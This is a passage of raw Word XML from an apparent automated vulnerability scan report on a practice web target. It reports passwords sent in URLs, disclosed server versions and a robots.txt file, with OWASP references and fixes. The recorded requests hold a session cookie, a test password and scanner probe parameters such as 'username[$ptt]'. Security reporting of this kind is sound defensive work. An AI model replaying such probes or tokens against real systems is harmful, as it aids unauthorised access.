                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/vulnerabilities/brute/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="1CA713E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85F5D6D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D901CA0"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458FF34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0B31613" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0162C799"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Query:</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Login=Login</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>password[$ptt]=Secure123456$</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>username[$ptt]=1d3d2d231d2dd4</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Headers:</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>User-Agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Cookies:</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>PHPSESSID=589f7516a2374b37367b6b2f248c71f5</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>security=low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="251B6F9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E73C0B5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79B4B89E"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following form sends inputs of type password plainly in the URL:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId148">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="28941CB7"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562512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51E68CD" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AA775E4"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49">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/vulnerabilities/csrf/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="2180D1C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7CFBD74" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37A3C9C8"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3D11D9A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5FD7EA3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48F012E6"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Headers:</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>User-Agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Cookies:</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>PHPSESSID=589f7516a2374b37367b6b2f248c71f5</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>security=low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="3F5137E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0D86656" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38DADCB1"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following form sends inputs of type password plainly in the URL:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId150">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29DAB5AB"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0032CE7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6783AA9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D6F418F"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51">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/vulnerabilities/csrf/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="4D92358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8275198" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57720E0F"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12B5F8E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D1B90D1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="258FA4E7"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Query:</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Change=Change</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>password_conf=Secure123456$</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>password_new=Secure123456$</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Headers:</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>User-Agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Cookies:</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>PHPSESSID=589f7516a2374b37367b6b2f248c71f5</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>security=low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="76B2134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A1983BC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FDFC5BF"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following form sends inputs of type password plainly in the URL:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId152">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="289AF518" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:p w14:paraId="5BB97342" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74878723" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We found a form which is submitted using a GET method and has inputs of the type password. The end result is that passwords are submitted in URLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E583398" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BFF4A8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Passwords submitted in URLs have a higher chance of being leaked. The main reason is that URLs can be leaked in browser cross-site requests via the Referer header. Additionally, URLs are usually stored in all kinds of logs. If any access or error logs of the server were publicly accessible, an attacker could also harvest password from it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2719B1D7" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC852A9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>You should submit passwords using POST rather than GET. This way sensitive data won't be shared to other locations via URLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6317D0CB" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B1ECD1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId153">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://developer.mozilla.org/en-US/docs/Web/Security/Referer_header:_privacy_and_security_concerns</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7BD6C512"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65FAB47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795337C0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="088EB677" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="68588A71" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DEB27A1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="215C2DDF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId154">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A4 - Insecure Design</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27C4075D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265B4D5C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B37C58" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB5FF1A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.1.21 Server software and technology found </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="73C37CE3" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70087F0E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10FF2A89" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>https://pentest-ground.com:4280/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="280F7335" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13F0731F" wp14:editId="0A7D371E">
                  <wp:extent cx="1397000" cy="1397000"/>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47900C8E" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D9AF8FE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="2D4EEABC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C3E90C1"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4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="6522AB0A"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07442EE8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Software / Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DC8383F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="24607FBE" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E089CE2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId155">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Nginx 1.27.4</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B778CC7" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Web servers, Reverse proxies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="510D5D8E" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25116083" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId156">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>PHP 8.4.3</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26B035D1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Programming languages</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08CAE722" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B11AEF5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We noticed that server software and technology details are exposed, potentially aiding attackers in tailoring specific exploits against identified systems and versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2071E245" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C022EE2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The risk is that an attacker could use this information to mount specific attacks against the identified software type and version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACD6853" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0527F1ED" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We recommend you to eliminate the information which permits the identification of software platform, technology, server and operating system: HTTP server headers, HTML meta information, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6878C64B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5C2A19" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId157">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/01-Information_Gathering/02-Fingerprint_Web_Server.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="76C7EEC6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>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35A2C7E4"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6F201F22" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E574946" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="663B39CB" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40DB37EA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34FCEDCA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId158">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A6 - Security Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="617F70F8" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="092511AB" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E237654" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId159">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A5 - Security Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="711DCF0E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9D3AAF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00B83EFD" wp14:editId="37550F28">
            <wp:extent cx="5852160" cy="32918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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5852160" cy="3291840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE102F2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Figure 1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Website Screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3AE0AB" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C9E966" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="989898"/>
        </w:rPr>
        <w:t>✘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420BA979" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5471625E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.1.22 Robots.txt file found </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="598813FE" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CD7A111" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="174AD8C1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>https://pentest-ground.com:4280/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="2D6A13D8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5533418E" wp14:editId="2A66C997">
                  <wp:extent cx="1397000" cy="1397000"/>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7E654186" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5473DEE6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="7C3AFF68" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D8F9E8E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrayHeader"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
